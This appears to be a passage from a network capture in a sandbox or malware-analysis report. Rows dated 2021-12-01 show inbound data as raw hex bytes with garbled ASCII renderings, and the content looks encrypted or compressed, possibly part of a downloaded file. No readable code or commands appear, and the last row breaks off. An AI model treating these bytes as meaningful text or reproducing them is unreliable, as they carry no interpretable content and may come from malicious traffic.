2021-12-01 15:22:56 UTC	75	IN	Data Raw: 37 e4 0b 7c f9 4a f1 52 d4 0f 3b da 10 85 c0 5f 3f b7 ac 0d e0 dc 8d 98 88 63 cc a2 21 5c 42 61 d6 95 4b 4a 09 64 cd 42 6e 0e ad 25 6e ea 23 ac 94 af 97 4f e0 1b b3 1d 4b d7 f7 4b dd 93 de 05 04 6b b9 3a 68 3b e8 3f e3 8e cd 18 d1 7c 1d b9 f3 ac 70 8d 26 fc 40 7b 8a 27 d9 bb e7 82 35 5a 9a 8c 3b f7 dc 1d 5f c0 3a bc af 08 e3 68 39 70 71 a8 80 06 ff bd ca 01 42 95 6a 8a e4 07 77 9c 7d 71 f3 31 0a e3 8e 53 cf 14 86 70 e4 1d be a9 c0 21 f8 97 c9 51 38 38 ca 03 7e 01 d0 22 3b 6b 46 d3 67 5c d0 5d 6c 6f e3 4c 82 2e 55 d6 12 d6 db 1e 1f 0f 9b 63 c0 8d 39 71 34 da 6b 5d 8e cb d0 ce 3b de 8c f5 ce e4 01 e3 82 bd b8 67 41 1b b9 ac 09 b9 3e 76 1b 20 b0 0b a1 6c 7e 93 e2 87 27 11 2b 6f 6f fd 5c 44 04 76 8c be 2c 0e 74 62 8a d2 74 6b e0 d6 da 6a 86 90 5e 41 83 c2 40 Data Ascii: 7|JR;_?c!\BaKJdBn%n#OKKk:h;?|p&@{'5Z;_:h9pqBjw}q1Sp!Q88~";kFg\]loL.Uc9q4k];gA>v l~'+oo\Dv,tbtkj^A@
2021-12-01 15:22:56 UTC	76	IN	Data Raw: 5c 4d 4a 7a 73 57 d1 e7 cb a1 74 20 2c a2 e1 bb 56 a0 68 fb 50 b1 0d f1 39 f1 a0 75 67 bc e1 cd 5b 5e d3 eb 31 2b 2c 52 bb 01 db 32 04 71 7c 0f 94 c1 c0 44 7a 16 0f 64 5a f8 74 bd 2a 5e 26 aa c5 1e a1 ff de ed f9 85 5e d3 71 a8 84 a1 70 cf 97 cc c5 b3 ff 83 9f 39 f5 d3 f1 c6 2c cd 7a c2 ca c7 40 68 20 de e5 b4 29 17 9b f9 d7 6e e8 3c 62 b6 88 ca c7 4c 17 bd 33 5b de d8 fb de 0f 0e 47 4f c9 47 15 6e 7d 06 f4 c1 cc 04 fb cd 46 82 1b 52 4f 3a 7f 59 3e 97 24 ca 86 3b ff dc 17 12 7a fa a0 87 44 6b 14 f5 17 9b 34 a9 84 c3 79 c8 ba 3b 5d a3 63 f8 ac 0c 9a db 17 92 a8 0e 3a 31 dd 97 da 7e 0a 3a 82 ae e7 96 a4 7d 8e 51 fd c3 35 64 dc e2 00 c7 53 35 f9 d5 d4 df 69 9b 93 42 01 f3 4e a5 e3 7a ea 55 b8 b5 c4 d2 f7 d0 e0 1d bc e0 06 fb cb 42 05 e2 f2 c7 57 26 46 9e 6c Data Ascii: \MJzsWt ,VhP9ug[^1+,R2q|DzdZt*^&^qp9,z@h )n<bL3[GOGn}FRO:Y>$;zDk4y;]c:1~:}Q5dS5iBNzUBW&Fl
2021-12-01 15:22:56 UTC	78	IN	Data Raw: bc c6 64 a2 f7 91 27 c9 de b5 b3 96 64 20 a6 26 d6 61 99 c1 9e 79 72 da 7e 8d b8 b0 34 77 1e 56 b6 00 5f 4c 94 48 8f 0f 5e 2f 52 21 b3 18 1c 3a e6 82 db 86 23 b3 9e ef a0 71 6b 73 f9 4e 3c 7d 8e 5f 13 a5 7a 16 05 f5 bc ad 2c 5b 44 9f fb 2d 3a 1a c6 de d8 0a df 52 0b 66 2f b7 4a 7d 0c ac 15 c6 2a 49 11 91 25 28 ab 0d 89 2f bf 34 d4 5b 53 37 fa c0 77 8e c4 d5 70 64 2c 52 bb 32 b2 20 4b c1 5f 4d 0e 0f 7a 81 21 e4 1b b1 01 fc 24 cd 2f 47 1d 12 07 a5 e2 6a 69 7f 58 a0 be bc 67 d6 7e 1a cf e6 56 d5 64 ce ff fb 0a 16 0d 60 62 f7 12 08 fe 5a ad f5 4e ed c0 a1 e3 99 25 6b ec ae f8 5e d1 76 24 d1 88 28 5f cd 89 b0 49 05 ad 01 cf e7 cb 59 27 ac 62 2f 82 1f 46 8a 24 ea 3a b1 1f 27 32 0b 6f 7d 89 52 40 17 d6 0a ef a2 e3 d3 3e 72 ff c2 20 73 47 eb b2 86 0e ee 28 59 22 Data Ascii: d'd &ayr~4wV_LH^/R!:#qksN<}_z,[D-:Rf/J}*I%(/4[S7wpd,R2 K_Mz!$/GjiXg~Vd`bZN%k^v$(_IY'b/F$:'2o}R@>r sG(Y"
2021-12-01 15:22:56 UTC	79	IN	Data Raw: ef aa 53 28 33 50 77 82 3b ee e3 93 60 d7 02 67 9d fc 4f 3e c8 df 32 42 fb 4f e5 9c 7e 0a 39 f4 89 bb 1f 3d 6a 3b f7 d4 ea 73 1c ba b6 bd bd ba a4 63 4e b2 79 0a 77 d7 98 28 88 21 bf 3d 17 40 f3 81 bb 2c 55 29 96 74 65 44 96 cd 1c bc a6 7d 86 d6 a5 29 20 34 4f b3 36 9a 84 30 ce c5 8a c9 d9 eb d9 85 21 34 5a a7 e4 0a 0b 23 0f 62 c2 c6 12 1a 84 db f0 d5 f0 ad 15 8f dd 9d 1c 7e e5 11 1d e0 ec a1 bd 3d e0 08 eb 47 63 a0 86 22 34 82 3e fa c5 76 ff 53 a0 7d 88 2a 5b ae f5 c1 a0 7e 1b 2d e4 e9 72 ff 56 fa 89 b1 01 40 95 41 8e 53 35 f9 d4 08 d1 30 bf 37 fb 0e 11 1e ae 5d 5c d1 6e 16 91 fb df 96 4a 82 db db de ef aa 9c c3 6c 14 8b 21 55 29 d6 f5 2f 43 40 64 d5 69 77 77 a9 83 40 69 61 40 b6 b8 52 b1 69 e1 7b 83 ab 16 dd 97 d4 e3 09 f0 d6 f3 a6 6e 66 47 d8 e5 8e 44 Data Ascii: S(3Pw;`gO>2BO~9=j;scNyw(!=@,U)teD}) 4O60!4Z#b~=Gc"4>vS}*[~-rV@AS507]\nJl!U)/C@diww@ia@Ri{nfGD
2021-12-01 15:22:56 UTC	80	IN	Data Raw: 25 57 3a 18 9c a0 6e e0 08 22 23 6c f3 c7 cc 5a 78 15 43 03 13 1b 20 f5 d9 a6 65 2e cd 18 f0 2e c5 49 63 dc 3a b9 29 10 15 b7 ad 35 21 a7 39 ff ab 98 7f 5c da 27 a1 89 35 c7 9c 75 5c d0 c9 c1 66 2c 53 c5 45 24 a1 dd 57 31 08 eb dc 90 30 81 b8 74 ee 16 84 48 58 ba 60 c8 00 55 b3 66 07 f8 76 d7 6c ff de 53 36 fc 4d 05 b7 3f 22 3d 6e 79 5d 50 a5 ea dc e6 45 fe c7 5f 44 46 96 dc e9 c5 a6 f2 bb e0 12 10 1e d7 2f ad ec 35 f3 2b 4f ef ad 1c 25 5c 28 27 d9 26 23 a1 63 1a cd 44 9c 7c c3 59 3d e7 92 a8 a2 a3 72 e8 27 61 41 c2 c4 4d 8c f3 a0 71 6c 0c 13 dc fa d1 73 64 50 d4 66 16 08 7c 86 60 20 bd 73 a5 f8 51 3b 01 32 97 35 f4 46 58 a3 7d 02 bc 4c 16 9f 33 d7 68 fa a0 04 3d 0d 66 cd ce a7 26 34 5a a7 1c cf 0e 45 50 bb 2a 9a 46 01 cd 3e 94 d9 f1 60 c9 44 81 47 57 ba Data Ascii: %W:n"#lZxC e..Ic:)5!9\'5u\f,SE$W10tHX`UfvlS6M?"=ny]PE_DF/5+O%\('&#cD|Y=r'aAMqlsdPf|` sQ;25FX}L3h=f&4ZEP*F>`DGW
2021-12-01 15:22:56 UTC	82	IN	Data Raw: 62 3b 88 95 a0 f9 a8 62 54 5f cd 28 d5 1a 20 e6 09 56 cd d7 1c c7 18 8d bd 40 e6 78 ea 19 56 f1 d7 e2 07 85 ad ec b7 55 af 18 29 9a c0 a4 57 a3 e1 00 1b d3 79 d2 14 97 cc c1 9f e0 82 be c4 27 27 f8 21 b5 21 a3 0f d3 f1 36 7d 86 e4 0e 8f 53 7b 76 96 3a 36 68 fa 56 57 62 7c 95 cf 7b 1f 9b 49 e1 7a eb 3b a5 18 38 51 d7 26 d2 18 1e 39 c4 fc f9 2f 5c 9a d1 00 d9 9f 6d b7 2c d9 ff ca c7 57 27 48 29 dd 5d 4b e7 15 5a ab 88 f8 57 2c 36 e0 87 b7 c1 c6 5c c8 c2 da ee a1 b3 4e bb 37 fd 35 32 b7 cc 53 aa ec 23 ac 94 af 01 72 7b b8 61 94 d4 79 91 4e b5 f3 41 13 17 9d 1b 21 07 91 d1 14 80 8a 3a e3 0f 9a ac 07 e4 1d b0 85 af 9f a7 dd 8a 27 b0 6f 91 c9 06 7c 00 c7 b3 06 95 56 9d 22 c0 24 a7 e3 13 0a ed 3c 7a 88 cb ca 3f 0a 11 91 a9 8e 34 96 58 33 49 0b f7 c7 c6 22 c2 3e Data Ascii: b;bT_( V@xVU)Wy''!!6}S{v:6hVWb|{Iz;8Q&9/\m,W'H)]KZW,6\N752S#r{ayNA!:'o|V"$<z?4X3I">
2021-12-01 15:22:56 UTC	83	IN	Data Raw: 70 3f ff 54 db 5e 22 c5 4c 0c f2 bb 68 fa 56 ac 12 29 ac 06 f4 51 2b 26 ac c7 1b 32 42 92 57 ad 6c f7 d0 e0 82 bb 87 b7 2f 56 ce ff ca da 7c 88 c1 43 05 f0 45 1b a4 60 26 a4 a4 7a d5 65 9b 1f 4d f8 6a d0 8a 2f cd d0 c4 c4 4d 3c aa 25 2a c4 1c d0 1e 38 ff 47 e4 13 9a 59 b8 3a d8 1a fe d9 fe 8a 31 d5 6e d0 75 85 ba a9 82 5e d5 f7 e6 c8 37 05 8e 1f 63 41 19 82 a5 8c 3d 73 52 61 4c 74 13 f4 d8 ba 33 c4 d9 78 11 98 55 c4 45 5a 5b 6b c4 d1 8d 61 a2 96 b6 f0 a3 ad 12 12 84 17 94 c8 f8 86 d5 ad ad 94 d2 d0 02 0b 14 0a 62 ce f9 40 39 a5 f3 ac 81 75 c2 02 e0 39 57 1d 4f de 88 ad 0d e1 06 f8 c4 42 95 37 6f e6 e2 eb 28 8d ee 16 84 1a 80 1e 3b f4 10 06 b8 b2 8b 29 ef 49 be c2 18 e6 ff 53 b1 42 65 d7 93 fb 23 51 c8 3b 0a 1d 5b a0 83 58 a2 1c b5 51 f7 cc cb 5f ab e7 72 Data Ascii: p?T^"LhV)Q+&2BWl/V|CE`&zeMj/M<%*8GY:1nu^7cA=sRaLt3xUEZ[kab@9u9WOB7o(;)ISBe#Q;[XQ_r
2021-12-01 15:22:56 UTC	84	IN	Data Raw: a8 0d b1 03 e0 83 a0 c1 34 da 87 7d 78 86 cb 52 33 77 9c a4 76 ac 0a 83 af b4 db 42 95 87 b6 23 ac 26 b8 10 87 20 f1 a2 68 27 02 73 74 7a 1b a4 bc 4d 91 45 90 e6 01 47 01 73 ef bf 22 cf 66 c4 04 f8 db 60 c9 84 21 42 67 ba 8f 26 29 dc 1a 90 64 db 6a 07 9f 90 ac 4b 7f b7 61 66 31 59 86 f9 21 21 e6 90 df 8b 35 05 9d 65 34 8f 3c fc f5 29 48 9c 6d a0 80 b1 08 12 0c e1 50 a2 b2 89 4f a9 ac 8b 5f b2 ce 1b a0 72 e2 9d d6 f6 b2 ee 45 28 a3 72 90 c1 1d 73 7c 15 81 73 63 54 b4 b9 a1 73 34 5f 54 b4 76 07 9c 54 2b 83 ad 15 81 af 7e 58 11 9e 6f ff ae 98 8b a0 6e e8 3c 2b 20 cb 40 6c 77 a3 ee c9 d0 76 45 17 9b e4 fc 07 69 0a e5 80 95 30 11 6e d0 d0 5c ce fd 07 7d 8c 2f d6 79 00 e3 80 0e 0c 1c ac 14 70 0d 24 c3 e5 82 39 60 2f 94 be dd e2 b7 36 67 db 00 dc 80 94 11 79 4a Data Ascii: 4}xR3wvB#& h'stzMEGs"f`!Bg&)djKaf1Y!!5e4<)HmPO_rE(rs|scTs4_TvT+~Xon<+ @lwvEi0n\}/yp$9`/6gyJ
2021-12-01 15:22:56 UTC	86	IN	Data Raw: ef b2 2d 82 3f 99 cb db 52 14 b2 45 35 b2 8d 94 20 08 fc df b5 a1 52 a7 15 f8 2d b7 22 38 32 e1 9c 5b d0 d0 57 23 62 9c 5a 79 64 b6 73 59 d3 62 96 63 b2 6b 81 dd 6c a3 2f 85 93 f9 99 d2 ef 05 ee 79 4f 24 87 f3 8b a1 73 48 57 9d 0e 7c e5 30 ac 61 6e ba d3 7c b0 08 f2 9b 9a 13 6d 58 f2 64 c8 e1 9a 08 03 d2 f2 89 cc 80 2a ba bd 7d 33 8a d0 67 cb da 3d 91 ec bf 3c f5 36 ff 88 72 6e 81 3f 91 28 fb 1f 6c 54 76 83 0d 69 90 f0 a2 20 26 85 08 bf dd 5b 9d b9 c7 fb bc cc 69 fc 74 f2 0b 39 9b 6a 41 58 b5 69 93 5b 3e 46 47 a6 16 be ab 35 21 0d 9d 70 1a bf 74 02 1e f8 c3 fb 57 3a 1b fc 74 3b 47 b8 ef 9b b9 5f 2d 09 b1 13 24 ed 27 e7 0f 5e 84 1e 87 c9 60 98 c3 ed 22 c0 49 9b bb 5f 52 ec d0 62 53 60 77 61 69 7d af b4 41 39 28 dc fa fc c7 4a a4 23 cb 97 a6 6c 8d 2b fc 7b Data Ascii: -?RE5 R-"82[W#bZydsYbckl/yO$sHW|0an|mXd*}3g=<6rn?(lTvi &[it9jAXi[>FG5!ptW:t;G_-$'^`"I_RbS`wai}A9(J#l+{
2021-12-01 15:22:56 UTC	87	IN	Data Raw: 71 7e 49 2c e2 14 1c ae 56 b4 2c 81 a4 f9 b0 8f 90 c7 f9 ce f2 86 bf c6 12 06 c5 44 81 ba b3 fa ba 48 1c 03 8e 32 84 e1 75 da 62 2a 5e d9 9e bd 33 8d c6 63 4c 8b 21 3d 47 d4 e7 5e c4 2c ad 2e 1e 54 b7 39 6a e3 16 67 ae 0f 93 15 73 94 3c 9f 5b 4f 25 35 a0 80 1e 38 70 17 74 73 1d 86 67 24 3a 72 7d ea 30 db f5 06 4b e4 fb 86 f0 8e 5a a2 fb fa 44 00 f3 78 b6 2b 5d 01 d9 f4 40 84 c8 2d 94 1d 1e 38 6c 6c 90 5d 2b c2 78 1f ad 84 b3 ec 0c 35 30 4c 85 1d 58 b9 a1 1c c8 df 17 74 f6 d7 e3 9d ea 00 37 08 58 cc 3b 7c 33 37 94 2c a9 8d ea d1 e3 57 32 c4 d1 b7 23 1a 6a 0d 9c 45 f4 cd 90 49 d5 7d 45 17 9f f0 2f 02 fc 45 06 f0 e9 b5 d9 0b 66 c5 5b 44 9f 91 4b 0b 63 49 02 e4 42 bc 09 6d 75 04 94 a2 fb c6 4c b2 57 c3 c1 46 02 7f 8a b8 a8 4a 90 bd d4 20 36 8f 92 74 09 6e e9 Data Ascii: q~I,V,DH2ub*^3cL!=G^,.T9jgs<[O%58ptsg$:r}0KZDx+]@-8ll]+x50LXt7X;|37,W2#jEI}E/Ef[DKcIBmuLWFJ 6tn
2021-12-01 15:22:56 UTC	88	IN	Data Raw: 99 37 75 49 11 4a 8e 96 5a 71 73 60 da f9 27 a6 1b 24 1b 62 2f 2c 9d f3 66 c5 12 72 0a f3 a4 7a 70 dc 8b 9d f8 c5 d1 62 a7 12 d9 7e 80 06 f5 22 2f b9 d1 87 20 76 f5 b9 43 9f ff 71 6a 14 d2 c8 af d1 f5 0e e3 75 08 aa 1d fa 72 fa 5e c5 aa 64 3e c5 6e 3c 45 05 6c f3 4c 0d f4 5e 4d 94 ab 1f b2 85 27 39 0c e6 00 cf 8f 90 14 ba ad 1d 34 9c 99 4e 2a 56 a4 7e 02 69 a1 ee dc e6 49 b3 05 73 66 5d 3a 8f 90 ab b5 20 3e ea 63 39 f7 df 9b 7b a2 79 90 c1 58 aa f7 56 40 66 c5 52 b4 f5 d5 fb ae 80 1e 3b f4 90 d7 c5 ef a1 07 03 84 ca c0 b8 2e d8 eb af 08 e8 fd c8 0a b0 94 48 80 8b 37 1f b7 35 e4 e1 7c e2 ed ff af eb ae 82 a7 8f 3b 73 fe 32 5a af 1e a9 2d 06 51 f0 ac a1 3c 73 66 cf 6c 30 a7 7c 30 9a 49 0d 60 d5 b4 aa 00 f1 7c 1d b9 37 f6 9b e8 b8 61 c1 45 c8 24 af 99 2a e9 Data Ascii: 7uIJZqs`'$b/,frzpb~"/ vCqjur^d>n<ElL^M'94N*V~iIsf]: >c9{yXV@fR;.H75|;s2Z-Q<sfl0|0I`|7aE$*
2021-12-01 15:22:56 UTC	89	IN	Data Raw: 5b b4 29 49 95 d8 ea 21 57 b3 e2 48 7e 7e 47 1d b9 38 f8 8b b7 a5 89 b7 ab dc b5 33 45 8b 94 46 8c 2c 87 aa 97 d2 f3 4c fd 10 b7 3a 79 1f 2d e9 b0 8d a6 9a d2 af 35 e8 3d ed 40 17 e1 37 ff ca 47 8a 12 02 e7 86 d1 b6 73 a8 c6 39 cc 03 16 0c e5 14 2d 3a eb 8b a9 8b bc b3 0c fe d6 69 87 36 76 fd d2 70 aa 9c 79 94 f5 af c2 76 0a fb cd d3 e9 94 47 09 6e 1d 5d c7 09 0a f4 59 23 eb 68 5a a5 e7 10 42 c0 af 0e 12 92 db b0 66 4a 01 07 89 3c 8c 0d a7 4b 03 7e 04 65 a6 4d fb 37 95 54 db 9d fb c3 53 31 c1 51 01 c0 e6 ec 3d f3 a5 73 80 40 fe b7 41 9f 0a 9b 65 b0 c0 3e 92 1e 51 a9 88 92 46 8f d0 8a f2 31 dc 1c ac a8 64 54 3f bf 8b c2 ca 5e 49 0e 19 84 81 42 6b a8 40 fb 56 84 de d7 7a 9e ec 0d 75 87 b6 58 69 84 ca 36 30 f4 42 9a 47 8e 3d 13 29 8a 15 95 c2 c5 89 58 2b 29 Data Ascii: [)I!WH~~G83EF,L:y-5=@7Gs9-:i6vpyvGn]Y#hZBfJ<K~eM7TS1Q=s@Ae>QF1dT?^IBk@VzuXi60BG=)X+)
2021-12-01 15:22:56 UTC	91	IN	Data Raw: 4a 4b 04 1e 47 8b b5 38 7b 9f f7 df 9a 5c 99 59 8a 27 ba 22 b7 3c 71 61 4f a3 dd 6a 07 ea ad c8 dc 1c 3d ae e8 05 71 69 f8 34 b2 1f 89 a2 f7 08 ff dd 9c 37 d6 17 85 b0 b3 1b ba b6 bd 8e d5 63 dc 42 87 a8 92 4d f8 44 f4 a3 7c 81 b2 85 b5 36 09 56 95 cf 7b 15 e6 1d 25 98 44 07 fa 5f 48 82 df 55 9c f4 d4 d5 ba a9 ff ad 95 af 00 c7 52 b2 c9 af a4 67 4e 38 f1 99 5a 9d 0a 66 58 bc b5 39 ff 35 1f 28 cf ad 1f b8 b0 c2 c6 d3 77 9c bd 3b 07 e7 b4 55 27 ac 89 e4 12 b3 04 f7 51 35 b3 30 aa 80 0e 8f 5a be 5c 22 d1 ef 2e 45 59 f5 6e f2 28 db f5 74 93 43 fd d8 fc d9 68 63 a9 56 51 ce c1 38 31 c3 58 37 c5 4e 25 98 4a 19 d2 f2 2a 43 88 bc ea 28 58 a6 8b 2a d1 31 3b d1 1b b6 be a4 f6 67 5b cc 91 b6 b4 a6 67 87 b6 bc a4 77 7e 49 8a 8e 46 9f 64 57 33 c0 a4 63 aa 03 fc 75 98 Data Ascii: JKG8{\Y'"<qaOj=qi47cBMD|6V{%D_HURgN8ZfX95(w;U'Q50Z\".EYn(tChcVQ81X7N%J*C(X*1;g[gw~IFdW3cu
2021-12-01 15:22:56 UTC	92	IN	Data Raw: 48 14 9d 97 c8 cd 4a 71 a0 ed 26 57 29 de 12 5f 40 de 14 17 19 ac 8b 23 7e 1d a3 30 f2 a3 29 ce 60 d0 3d 59 b3 95 ff c5 50 be 59 64 0d b2 82 33 41 7e 01 d9 65 e6 dd 46 16 28 6e e9 b0 93 21 e1 46 44 9d ff 56 25 ab 1a e3 18 9d 90 50 a3 ef 5c 3d d6 28 ac 8b a3 76 7e 0e ad 25 54 20 78 e2 65 58 c6 28 70 bd 97 68 e3 19 4d f5 50 fe c8 b8 b0 8d a2 64 2d 26 ef b1 01 44 9e e4 9b f5 cd 41 1b 77 84 d5 42 06 f9 cb 42 91 c7 22 0c 05 7f 9d 54 c3 11 eb 5d 5e d0 19 4a 9b b2 c0 40 7f 88 a3 67 ed 55 bf 75 89 b0 8f dc ec 41 38 dc 18 01 d1 ec 30 49 06 e2 ee 11 f8 a9 16 11 06 27 a2 f4 3b 1e b1 0a 09 b8 7c be cb d9 55 f4 49 33 23 1f 99 d5 6e e3 95 c2 1b a8 23 06 83 6a e7 0e 9f 1b 16 80 9a 59 21 a8 a7 e7 18 0f 8a e5 23 38 27 a1 ef b4 ba bd cc 0d 59 33 db 9b 06 b2 d8 dc 1e 35 65 Data Ascii: HJq&W)_@#~0)`=YPYd3A~eF(n!FDV%P\=(v~%T xeX(phMPd-&DAwBB"T]^J@gUuA80I';|UI3#n#jY!#8'Y35e
2021-12-01 15:22:56 UTC	93	IN	Data Raw: 80 3f 25 03 f6 d0 f3 25 93 00 c4 2f 32 09 31 dd 95 c8 50 d6 f6 a0 8d eb 34 0a e9 bf b5 12 01 aa 6d 44 83 bd 26 33 2f 5e 98 bf 11 6b 80 be 90 a9 8a 63 b9 51 e1 16 8c df 70 af b9 cd 4a 41 f3 83 f1 44 0a a1 66 bd c5 51 35 fa a8 63 da 33 d8 49 7e be 9b 54 bb 27 3a ae 95 ca c7 89 91 d2 f7 d0 79 13 e7 1b 35 b7 a7 6b 3f 73 fc 0c 7a 93 ac 06 65 4e 28 c8 c3 cd dd 85 29 54 d2 74 60 b3 99 48 e8 a2 e7 fd 5e 49 70 26 b4 2f b6 38 fc 35 7e 8c 0e 96 df a3 70 6e 8e cb cf 4a 17 00 f4 93 4a 0b 58 3d 62 ab 9f 65 09 6f 61 56 50 54 38 9d 8f 47 ea 08 7a e6 23 35 ad 66 c6 d0 f4 24 fb 20 3d f5 4e 8a 3a b8 43 25 12 89 b3 07 ed 86 34 ad 81 39 83 40 2d 40 0c ea 2a c5 39 e9 60 32 36 bf 9a 5b 59 b3 63 4d e5 13 60 8a db d0 27 cc c7 56 33 ac 89 70 8d a6 6c e8 78 1e bc a4 7d 11 a9 15 75 Data Ascii: ?%%/21P4mD&3/^kcQpJADfQ5c3I~T':y5k?szeN()Tt`H^Ip&/85~pnJJX=beoaVPT8Gz#5f$ =N:C%49@-@*9`26[YcM`'V3plx}u
2021-12-01 15:22:56 UTC	95	IN	Data Raw: 40 5f e9 8e 61 59 26 5a b5 0e da ed dd d0 ef a1 92 48 e5 45 0e 2e 08 ef b7 47 01 7c d1 6d ef f0 b2 eb b7 3c 61 40 57 d3 6b 48 fb d1 6f 20 38 48 54 a5 8c 60 cf 69 06 e4 3c b2 9f ca b5 26 33 b4 b0 bc 68 e0 86 16 99 f5 cf 66 c5 45 24 d0 ee 1d f4 40 71 19 97 f2 f3 a9 2a 13 84 33 ba b9 08 39 ff f1 e5 8d af 73 72 d4 2f d4 73 3f 76 34 44 9c 79 8e 37 1a 11 a9 68 ea 35 83 a7 81 61 55 4f 44 85 a1 9b f4 6a 25 b5 08 a5 fb de 6d e6 2f 5a 97 c4 c8 c2 59 15 9f 71 51 28 d1 67 55 3d 75 73 6d 77 99 51 ae f5 d8 e7 8d 99 4c 87 ae 92 58 bc 3a f4 14 a9 9f 08 60 2e 70 5c 3c 88 95 d7 d1 8a 32 d5 8d e6 87 6a bd 99 fa e2 46 fb f0 13 fb 58 4f 8a ba 4a 65 e2 f9 95 56 27 44 20 cc da 71 04 eb 0f e5 0e f2 53 8a c7 4e d8 84 96 7d 32 3c 06 c5 5a 20 34 de eb 58 38 96 a0 b9 0d f1 4b 8d 20 Data Ascii: @_aY&ZHE.G|m<a@WkHo 8HT`i<&3hfE$@q*39sr/s?v4Dy7h5aUODj%m/ZYqQ(gU=usmwQLX:`.p\<2jFXOJeV'D qSN}2<Z 4X8K
2021-12-01 15:22:56 UTC	96	IN	Data Raw: 17 3e 64 c0 b8 18 75 29 ee f8 bd bb e2 ad 03 e0 e3 27 58 ab df 67 d9 f4 ad a8 ff 08 e5 7d c8 11 9d ff c5 68 41 19 84 39 62 f0 36 c4 5c 35 23 14 81 3c 83 25 5f 5e 2a 5d 89 56 0a 60 22 fa 17 cc 21 92 ee 20 20 31 76 25 6b 95 76 69 e0 83 bd be 43 a0 90 5b 85 59 b8 3d 1e 86 07 a2 65 57 1b 29 3f f0 1a e6 e8 34 7b 0d 92 cb cc 2e 45 2b 50 5a 20 c5 aa 89 97 37 15 12 99 36 7a 29 51 d3 f6 d3 90 4c b7 a7 0a 7e ec d3 64 f0 da 15 7a 8c ac 62 51 b4 4f a5 10 fc 07 7a 16 14 1f 31 ac 81 55 d9 98 a7 d5 ba c4 65 6c 19 89 f1 98 88 3b 13 fd 3d 6c bc 57 de cd 4d 72 ff 26 38 71 ff 06 fe d4 36 6b 7c 39 9d 64 a4 7f 34 26 fd db 3a 10 c6 c4 35 b8 c8 24 27 ba f1 ed 51 dd 6e 82 7f a9 7a cf 84 a8 dc e6 fd 83 19 7d 8b a1 76 dd 81 32 91 c1 33 fd d2 52 84 e2 13 2c 66 14 0e 54 a7 08 e9 bc Data Ascii: >du)'Xg}hA9b6\5#<%_^*]V`"! 1v%kviC[Y=eW)?4{.E+PZ 76z)QL~dzbQOz1Uel;=lWMr&8q6k|9d4&:5$'Qnz}v23R,fT
2021-12-01 15:22:56 UTC	97	IN	Data Raw: 32 ab 8f d1 6c 20 ed b2 e0 ea 3a ef 29 3a 74 e1 8b a1 fa 6c e4 9f d9 8d a6 6f 73 6d 75 e4 3a 02 e6 13 dd 96 26 b8 a7 74 73 64 d4 3b 3a 64 f4 ee 3e e3 d4 f5 d3 6d 7e 1e 22 1e 9d ff 5d d5 69 7e 07 7a 0b 5d 1d a5 d3 07 6b 67 22 bb d6 64 50 b7 3b 31 38 63 79 77 81 a3 81 2e 55 b8 21 5b 52 b3 03 7f b7 4f 21 b8 27 a7 e3 8e 53 2d 50 38 fd c4 5a 2a 42 86 78 8c 6a ee 91 bf d1 1e 2a 5d ac 03 36 87 8c aa b0 97 2e d4 90 a4 fe 86 20 83 db 1a 0e c1 d2 7a 99 de 82 d6 f6 dc 1a a6 b6 b9 a6 0a 67 33 cf 6c 85 5d 1c bb 6c a6 fb a2 bc 94 ff 48 8d 01 9d ec a3 82 bc ea 2b df e6 ea 7b 02 88 92 da d3 de 5f a8 04 fb 79 41 e8 a7 86 b1 4d 04 f4 2d 36 0a 7b c0 bb a0 40 c6 50 50 ac 3a c0 c7 9f 91 21 5e bf 18 6f 93 47 54 4f ad cc d6 5a 9b 60 df 47 ef 37 18 18 9e 70 fc f3 14 d4 fe f2 8e Data Ascii: 2l :):tlosmu:&tsd;:d>m~"]i~z]kg"dP;18cyw.U![RO!'S-P8Z*Bxj*]6. zg3l]lH+{_yAM-6{@PP:!^oGTOZ`G7p
2021-12-01 15:22:56 UTC	99	IN	Data Raw: bf 25 ab e5 13 19 85 48 cb 5c 35 f2 3e f7 5b 5e 51 5d 4e 2a 33 13 36 b0 8e 4a 8f db 7e 9c ed f5 24 6f 14 f2 3f e2 95 53 2d 4b ec 49 f1 31 43 0b 8b 64 ca 31 8a d3 38 77 96 e6 69 e3 e9 43 8b cd 54 e6 6e 7f b9 b4 ca 3f 89 34 d5 79 51 35 6f 92 5a 59 e5 8b 55 61 f6 1b a2 60 76 6b e7 b5 2a cb 27 aa c3 6b e9 d2 6f 25 55 44 56 f0 03 80 9b 89 3f 6f 76 98 0c ee d3 eb 76 f0 dd 68 72 64 8c d5 1f 20 d9 60 d5 fe ba a7 1a f0 ae 01 4f d3 07 aa 6c f3 ac 1e bc bc 2e d2 f9 2e d2 17 c5 af c9 4c 61 00 e9 ca c6 c0 1c 53 a3 c5 f2 a3 df 89 89 9e 8a af 65 d7 27 5a 94 5f 5a d8 6e 60 d4 12 83 f1 34 08 01 50 a6 6e 4b 33 05 76 02 f2 34 b8 25 33 8d bd 26 25 59 ef 31 5c e3 8e 53 23 e6 50 ab 0b 6a 74 1c 26 f0 32 4b 16 12 ef 3a f5 a7 0d 2f 28 b7 3d ef 62 d0 f6 48 8d 33 59 56 a2 75 98 b5 Data Ascii: %H\5>[^Q]N*36J~$o?S-KI1Cd18wiCTn?4yQ5oZYUa`vk*'ko%UDV?ovvhrd `Ol..LaSe'Z_Zn`4PnK3v4%3&%Y1\S#Pjt&2K:/(=bH3YVu
2021-12-01 15:22:56 UTC	100	IN	Data Raw: cb 5f cd d1 e1 8c 24 2d 28 14 84 2b d4 e8 a6 84 6b fb 89 5a a4 6a b1 bf 64 ce fe b5 b1 96 db 98 41 18 e1 1d 3c 39 1f f8 0b 63 55 22 a2 90 0c 01 7f 7b 95 d7 6e 79 17 a8 70 7a 86 a0 71 62 c9 b1 f7 a3 3a 7e 0a f6 c1 b7 2e de 23 0e ae 9d 7d fa 8e a1 61 cf 6d e6 3b 7e 05 72 e7 19 ca 6d 1b 29 4b 1a 8c 26 3e 05 6b 98 3c 9e 68 fc 43 9c 1a 18 99 f5 03 97 5a b4 07 a8 9f e1 92 3c 8a cd 0e 10 1b b8 ba 3f d0 e0 8f eb 72 ae 40 f7 c5 c6 50 ad db 09 65 e6 8f 4d 34 52 19 82 ec 02 6d f2 20 db 25 db 65 97 5d b0 72 16 98 09 9e 19 1a e9 ac 64 78 22 d2 25 3a 6b 9b 0d f9 ad fa 3b ce 82 e5 0a 3f c0 f0 ba 4c 14 56 32 db 85 2d 9a bc 5c 51 eb ac 71 a7 ef 7b 88 d0 1b ff a7 eb b0 88 d2 b9 15 8a 28 50 3f 35 ea ce c8 dd 0e ec 3d f3 a5 ad 31 de 12 16 9c 4f d8 ff f5 3b 12 e8 02 a1 e1 9c Data 